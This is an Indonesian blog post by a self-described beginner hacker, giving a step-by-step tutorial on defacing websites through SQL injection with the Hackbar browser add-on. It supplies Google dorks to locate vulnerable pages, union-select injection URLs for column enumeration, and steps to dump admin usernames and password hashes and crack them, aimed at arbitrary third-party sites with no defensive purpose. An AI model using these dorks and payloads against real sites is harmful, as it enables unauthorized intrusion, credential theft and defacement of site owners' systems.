Uncategorized

Tutorial Deface SQLI with Hackbar

Ok gans, kali ini w post Tutorial Deface SQLI with Hackbar ok oc? yang manual mah w ga bisa, jadi kapan kapan aja :’v oke lanjut

BAHAN :
– Hackbar
– Dork : inurl:list.php?id=
              inurl:listing.php?id=
– Udud
– Waifu yang menemani 🙂

STEP BY STEP :
1. install HACKBAR nya, hanya bisa di mozilla firefox

2. setelah install, dorking dulu di google ya

3. setelah menemukan target, kasih tanda ‘ di belakang angka target
    Example : www.target.com/list.php?id=69
    NB : kalau ada perubahan pada web tersebut / error, berarti vuln SQL-i



4. Setelah itu cari column target,
    EXAMPLE =
    www.target.com/list.php?id=69 order by 1–  = > NO ERROR
    www.target.com/list.php?id=69 order by 2–  = > NO ERROR
    www.target.com/list.php?id=69 order by 3–  = > NO ERROR
    www.target.com/list.php?id=69 order by 4–  = > NO ERROR
    www.target.com/list.php?id=69 order by 5–  = > NO ERROR
    www.target.com/list.php?id=69 order by 6–  = > NO ERROR
    www.target.com/list.php?id=69 order by 7–  = > NO ERROR
    www.target.com/list.php?id=69 order by 8–  = > NO ERROR
    www.target.com/list.php?id=69 order by 9–  = > NO ERROR
    www.target.com/list.php?id=69 order by 10–  = > NO ERROR
    www.target.com/list.php?id=69 order by 11–  = >  ERROR
    BERARTI ITU COLUMN NYA ADA 10

5. Setelah mengetahui columnya, cari angka ajaib yang ada pada website tersebut
    Example : www.target.com/list.php?id=-69 union select 1,2,3,4,5,6,7,8,9,10–
    NB : Jangan lupa mengasih tanda ” – ” di belakang angka nya ya
    Oke dapat angka ajaibnya, yaitu angka 2 :’D

6. Hapus angka 2 nya, setelah itu klik UNION BASED > DIOS MySQL > Dios by Zen


7. Setelah itu, cari table user adminnya, tekan CTRL + F, trus cari USER

8. Setelah ketemu table user adminnya, klik UNION BASED > DATA > DATA ONE SHOT


9. Nanti disuruh isi column 3x
    1. DATABASE()
    2. user [ di samakan dengan table web target kamu ]    3. uName,0x7c,uPass [ disamakan juga dengan column web target kamu ]

10, Setelah itu klik OK… dan muncullah USERNAME dan PASSWORD admin target :’D

Itu password nya masih dalam hash type MD5, jadi kalian decrypt ya :’D
Kalau gak ngerti silahkan tinggalkan komentarnya, kalau ada kesalahan mohon maaf, saya blogger pemula, jadi wajarkan aja :’v
Sekian Terimakasih

vanz1337

Saya Adalah Seorang yang tertarik akan dunia teknologi, hobi saya ngidol+ngoding

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also

Close
Back to top button
Close
Close
Advertisment ad adsense adlogger